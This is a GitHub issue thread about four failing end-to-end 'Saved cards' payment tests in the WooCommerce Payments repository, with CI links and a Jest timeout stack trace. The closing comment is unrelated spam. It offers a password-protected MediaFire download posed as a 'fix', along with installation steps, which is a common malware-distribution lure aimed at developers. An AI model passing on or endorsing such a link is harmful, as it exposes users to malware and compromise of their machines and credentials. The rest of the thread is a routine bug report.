### ISSUE TITLE
E2E broken tests: Saved cards

### ISSUE THREAD

**Issue by htdat** [Automattic/woocommerce-payments#9338]
### Description

These tests are failing consistently for a few days: 

 - Saved cards  › when using a 3DS card added on checkout › should process a payment with the saved card
 - Saved cards  › when using a 3DS2 card added through my account › should process a payment with the saved card
 - Saved cards  › when using a basic card added on checkout › should process a payment with the saved card
 - Saved cards  › when using a basic card added through my account › should process a payment with the saved card

Links: 

- Most recent: https://github.com/Automattic/woocommerce-payments/actions/runs/10569313689
- First failure: https://github.com/Automattic/woocommerce-payments/actions/runs/10495053191

**Output from the test failure**:

```
2024-08-27T00:56:04.5478178Z   ● Saved cards  › when using a basic card added through my account › should process a payment with the saved card
2024-08-27T00:56:04.5479135Z 
2024-08-27T00:56:04.5479512Z     thrown: "Exceeded timeout of 100000 ms for a test.
2024-08-27T00:56:04.5481682Z     Add a timeout value to this test to increase the timeout, if this is a long-running test. See https://jestjs.io/docs/api#testname-fn-timeout."
2024-08-27T00:56:04.5482964Z 
2024-08-27T00:56:04.5483928Z       at originalIt (../../../../../Users/ronrennick/Sites/solaris/woocommerce/tests/e2e/env/src/setup/jest.failure.js:61:10)
2024-08-27T00:56:04.5485703Z       at tryCatch (node_modules/@babel/runtime/helpers/regeneratorRuntime.js:45:16)
2024-08-27T00:56:04.5487435Z       at Generator.<anonymous> (node_modules/@babel/runtime/helpers/regeneratorRuntime.js:133:17)
2024-08-27T00:56:04.5488971Z       at Generator.next (node_modules/@babel/runtime/helpers/regeneratorRuntime.js:74:21)
2024-08-27T00:56:04.5490517Z       at asyncGeneratorStep (node_modules/@babel/runtime/helpers/asyncToGenerator.js:3:17)
2024-08-27T00:56:04.5492083Z       at _next (node_modules/@babel/runtime/helpers/asyncToGenerator.js:17:9)
2024-08-27T00:56:04.5493348Z       at node_modules/@babel/runtime/helpers/asyncToGenerator.js:22:7
2024-08-27T00:56:04.5494524Z       at node_modules/@babel/runtime/helpers/asyncToGenerator.js:14:12
2024-08-27T00:56:04.5496128Z       at test (../../../../../Users/ronrennick/Sites/solaris/woocommerce/tests/e2e/env/src/setup/jest.failure.js:59:12)
2024-08-27T00:56:04.5498161Z       at it (tests/e2e/specs/wcpay/shopper/shopper-myaccount-save-card-and-checkout.spec.js:45:4)
2024-08-27T00:56:04.5500152Z       at originalDescribe (../../../../../Users/ronrennick/Sites/solaris/woocommerce/tests/e2e/env/src/setup/jest.failure.js:30:4)
2024-08-27T00:56:04.5501632Z           at Array.forEach (<anonymous>)
2024-08-27T00:56:04.5503074Z       at tests/e2e/specs/wcpay/shopper/shopper-myaccount-save-card-and-checkout.spec.js:23:24
2024-08-27T00:56:04.5505085Z       at originalDescribe (../../../../../Users/ronrennick/Sites/solaris/woocommerce/tests/e2e/env/src/setup/jest.failure.js:30:4)
2024-08-27T00:56:04.5507524Z       at Object.describe (tests/e2e/specs/wcpay/shopper/shopper-myaccount-save-card-and-checkout.spec.js:22:1)
```

### Additional context

- Slack convo p1724676591455639-slack-CGGCLBN58

### Priority

- I am adding this priority as high as failure tests are common and critical secenarios.

### Reason why this e2e test is broken

- I tested these flows manually on my testing site and they're all working well. 

> [!Important]
> Please, ensure when closing this issue (PR fix) that only one `e2e: broken` label is added and it is accurate.
> - [x] I confirmed there's only one `e2e: broken` label in this issue and it is accurate.

**Comment by amir1387aht** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
